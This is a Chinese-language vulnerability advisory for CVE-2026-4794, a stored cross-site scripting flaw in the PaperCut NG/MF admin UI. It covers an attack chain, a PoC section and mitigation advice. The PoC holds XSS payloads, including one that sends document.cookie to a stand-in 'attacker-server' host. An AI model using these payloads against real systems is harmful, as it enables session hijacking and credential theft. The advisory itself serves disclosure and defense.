CVE-2026-4794 CVSS 4.8 中危

CVE-2026-4794 PaperCut NG/MF 存储型XSS漏洞

披露日期: 2026-03-31

来源: eb41dac7-0af8-4f84-9f6d-0272772514f4

漏洞信息

漏洞编号

CVE-2026-4794

漏洞类型

跨站脚本 (XSS)

CVSS评分

4.8 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

PaperCut NG/MF

漏洞概述

PaperCut NG/MF 25.0.10之前版本存在多个跨站脚本（XSS）漏洞。由于应用程序对用户输入缺乏充分的过滤，经过身份验证的管理员用户可以通过特定的UI字段注入恶意的Web脚本或HTML代码。攻击者可利用此漏洞劫持其他管理员的会话，进而以受害者的权限执行未授权的操作，造成安全风险。

技术细节

该漏洞本质上是PaperCut NG/MF管理界面中的存储型跨站脚本漏洞（Stored XSS）。其主要成因在于应用程序未能对用户提交的输入进行有效的上下文感知编码或严格的输入验证。由于攻击向量需要高权限（PR:H），即攻击者必须拥有管理员凭据，因此漏洞利用通常发生在内部权限提升或横向移动场景中。攻击者通过在存在缺陷的UI字段（例如配置名称、用户描述等）中植入恶意载荷（如<script>标签），将其持久化存储于数据库。当其他管理员访问受污染的页面时，服务器会直接渲染未过滤的恶意内容，导致载荷在受害者的浏览器中执行。利用此漏洞，攻击者可以绕过同源策略，窃取受害者的Session Cookie或利用其认证令牌调用后台API，从而在无需凭据的情况下接管其他管理员账户或执行敏感的批量操作。

攻击链分析

STEP 1

步骤1

攻击者使用管理员账户登录PaperCut NG/MF管理控制台。

STEP 2

步骤2

攻击者定位到存在漏洞的UI输入字段（例如配置选项或用户详情页）。

STEP 3

步骤3

攻击者在字段中输入精心构造的恶意JavaScript代码（XSS Payload）并保存更改，数据被存储在服务器端。

STEP 4

步骤4

受害者（其他管理员）在不知情的情况下访问包含该恶意数据的页面。

STEP 5

步骤5

受害者的浏览器解析并执行恶意脚本，攻击者从而窃取其Session ID或执行未授权操作。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!--
PoC for Stored XSS in PaperCut NG/MF (CVE-2026-4794)
Context: Administrator UI Input Field
Usage: Inject payload into a vulnerable field and wait for another admin to view.
-->
<script>
// Simple payload to demonstrate XSS execution
alert('XSS Triggered: ' + document.cookie);

// Advanced payload to exfiltrate session (Example)
var img = new Image();
img.src = "http://attacker-server/log.php?c=" + encodeURIComponent(document.cookie);
</script>

<!-- Alternatively, using img tag if script tags are filtered -->
<img src=x onerror=alert('XSS')>

影响范围

PaperCut NG/MF < 25.0.10

防御指南

临时缓解措施

如果无法立即升级补丁，建议限制管理员账户的访问来源IP，仅允许受信任的内网IP访问管理后台。同时，加强管理员的安全意识培训，避免点击可疑链接或查看来源不明的配置页面。此外，可以使用浏览器扩展程序（如NoScript）作为临时的辅助防御手段。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表